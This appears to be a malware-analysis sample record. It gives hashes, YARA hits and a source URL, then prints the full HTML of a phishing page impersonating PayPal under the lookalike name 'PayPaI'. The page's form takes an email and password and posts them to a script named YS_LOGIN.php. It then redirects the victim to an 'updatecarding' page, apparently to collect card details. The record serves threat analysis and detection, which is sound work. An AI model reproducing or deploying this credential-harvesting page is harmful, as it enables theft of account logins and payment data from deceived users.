Sample details: 32eed28681afb8b0b19283187222311c --

Hashes
MD5: 32eed28681afb8b0b19283187222311c
SHA1: cc13c6b8a05fa356473f4d2830c01e46d70052ef
SHA256: f3a1bc88bc64ce82d780c1d701e2b594b39bf7f60473f37e40fb957db36d94e2
SSDEEP: 96:9bVZp3KyHfBQPXRrihUbWlIXByyfH7qxPSgg:9htHfqvxi+TX0kHCg
Details
File Type: HTML
Yara Hits
YRP/domain | YRP/contentis_base64 |
Source
http://mzyb.in/vmru/venum/laproald/Login/7d313bb51397033940333a46996b1859/loginauth.php?country.x=&locale.x=&SEC.x=ID-PA064fbd46f0abbfa73cc2bf2fa140faa2&home?$1$C7qvKl7j$8e0yPkESrW2cj.j6ZwZxa.$1$C7qvKl7j$8e0yPkESrW2cj.j6ZwZxa.$1$C7qvKl7j$8e0yPkESrW2cj.j6ZwZxa.&Safety=6el0Zk24DLWhw3aHAf9M5OSgbjPnrTNy8VRoUGqxFpJXiCBtu1EsmQKzY7vdIcGdmk45ZrcRopQKb7LU9lhTOCS8f21waj6evuJstEzPgAFI3D0iNxMByqXnWHYV30216871410&$1$C7qvKl7j$8e0yPkESrW2cj.j6ZwZxa.
Strings
		<!DOCTYPE html>
<html class=" js " lang="en">
	<head>
		<meta charset="utf-8">
		<title>() Log in to your PayPaI account</title>
		<meta http-equiv="content-type" content="text/html; charset=UTF-8">
		<meta name="application-name" content="PayPaI">
		<link rel="shortcut icon" href="YSASSETS/img/YS_favicon.ico">
		<link rel="apple-touch-icon" href="style/apple-touch-icon.png">
		<!-- FORM -->
		<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1, user-scalable=yes">
		<link rel="stylesheet" href="YSASSETS/css/app_ys.css">
		<link rel="stylesheet" href="YSASSETS/css/ys_rotate.css">
		<script src="YSASSETS/js/modernizr-2.js"></script>
	</head>
	<body>
	<div class="rotation"> <p> Checking your info... </p> </div>
	<div id="main" class="main " role="main">
		<section id="login" class="login" data-role="page" data-title="Log in to your PayPaI account">
			<div class="corral">
			<div id="content" class="contentContainer">
	<header><p class="paypal-logo paypal-logo-long">PayPaI</p></header>
	<h1 class="headerText accessAid">Log in to your PayPaI account</h1>
	<!-- FORM -->
	<form action="" required="required" method="post" class="yass-form-login" name="login" >
		<input name="locale.x" value="en_US" type="hidden">
		<input name="processSignin" value="main" type="hidden">
		<div id="passwordSection" class="clearfix">
			<div class="textInput fieldempty " id="login_emaildiv">
				<div class="fieldWrapper">
					<label for="email" class="fieldLabel">Email address</label>
					<input id="email" name="yass_email" class="hasHelp  validateEmpty  " required="required" aria-required="true" autocomplete="off" placeholder="Email address" type="email">
				</div>
				<div class="errorMessage" id="emailErrorMessage">
					<p class="emptyError">Required</p>
					<p class="invalidError hide">That email format isn
t right</p>
				</div>
			</div>
			<div class="textInput lastInputField" id="login_passworddiv">
				<div class="fieldWrapper">
					<label for="password" class="fieldLabel">Password</label>
					<input id="password" name="yass_password" class="hasHelp  validateEmpty  " required="required" aria-required="true" value="" placeholder="Password" type="password">
				</div>
				<div class="errorMessage" id="passwordErrorMessage">
					<p class="emptyError hide">Required</p>
				</div>
			</div>
		</div>
		<div class="actions actionsSpaced">
			<input class="button actionContinue" type="submit" id="btnLogin" name="btnLogin" value="Log In">
		</div>
		<div class="forgotLink">
			<a href="#" id="forgotPasswordModal" class="scTrack:unifiedlogin-click-forgot-password">Having trouble logging in?</a>
		</div>
	</form>
	<a href="#" class="button secondary" id="createAccount">Sign Up</a>
	</div></div>
	<footer class="footer" role="contentinfo">
		<ul class="footerGroup">
			<li><a href="#">Contact Us</a></li>
			<li><a href="#">Privacy</a></li>
			<li><a href="#">Legal</a></li>
			<li><a href="#">Worldwide</a></li>
		</ul>
	</footer></section></div>
	<div class="transitioning hide"><p class="checkingInfo hide">Checking your info
</p><p class="">Just a second
</p></div>
	<!-- SiteCatalyst Code -->
	<iframe style="width: 0px; height: 0px; border: 0px none; position: absolute; z-index: -999;" title="" src="style/a.htm"></iframe>
	<div aria-label="Password Recovery" aria-describedby="forgot-password-modal" role="dialog" tabindex="-1" style="display: none; top: 134px; left: 511px;" class="ui-dialog ui-widget ui-widget-content ui-corner-all ui-front">
	<div class="ui-dialog-titlebar ui-widget-header ui-corner-all ui-helper-clearfix">
		<span class="ui-dialog-title" id="ui-id-1">&nbsp;</span>
		<button title="close" aria-disabled="false" role="button" class="ui-button ui-widget ui-state-default ui-corner-all ui-button-icon-only ui-dialog-titlebar-close" type="button">
			<span class="ui-button-icon-primary ui-icon ui-icon-closethick"></span>
			<span class="ui-button-text">close</span>
		</button>
	</div>
	<div style="display: block;" class="pwr-modal forgotPasswordModal ui-dialog-content ui-widget-content" id="forgot-password-modal" aria-label="Password Recovery">
		<iframe id="pwdIframe" data-src="/us/webapps/accountrecovery/passwordrecovery" scrolling="no" data-auto-reload="true" data-tabindex="0"></iframe>
	</div></div>
	<iframe src="style/i.htm" style="width: 0; height: 0; border: 0; position:absolute; z-index:-999" id="ppfniframe" name="ppfniframe"></iframe>
	<script src="YSASSETS/js/ys_dowira_jquery.js"></script>
    <script src="YSASSETS/js/ys_dowira_plugins.js"></script>
<script>
            $(".yass-form-login").validate({
                ///////////////////////////////////////////////////////////
                submitHandler: function(form) {
                    $(".rotation").show();
					$.post("YSSEND/YS_LOGIN.php?ajax", $(".yass-form-login").serialize(), function(result) {
                            setTimeout(function() {
                                $(location).attr("href", "updatecarding.php?country.x=&locale.x=&SEC.x=ID-PAccf6296b5f634d724358d5561cc6cbb6&home?$1$kacpoglw$eb9BZC8B/PoQGIxdCmd7n1$1$kacpoglw$eb9BZC8B/PoQGIxdCmd7n1$1$kacpoglw$eb9BZC8B/PoQGIxdCmd7n1&Safety=YV5UWh3tXsemLQcBTOZvI8MrEHuxGl1DAapNjCSobRJkndgwPKq9yf46iz7F20RfPEhKL2W7YapHmQXCA5Nkozrywc9jG3gsFDSnVObI0xuvd4J6Belti8TUqMZ183335137560&$1$kacpoglw$eb9BZC8B/PoQGIxdCmd7n1");
                            });
                    });
                },
                ///////////////////////////////////////////////////////////
            });    
        </script>
	</body>
</html>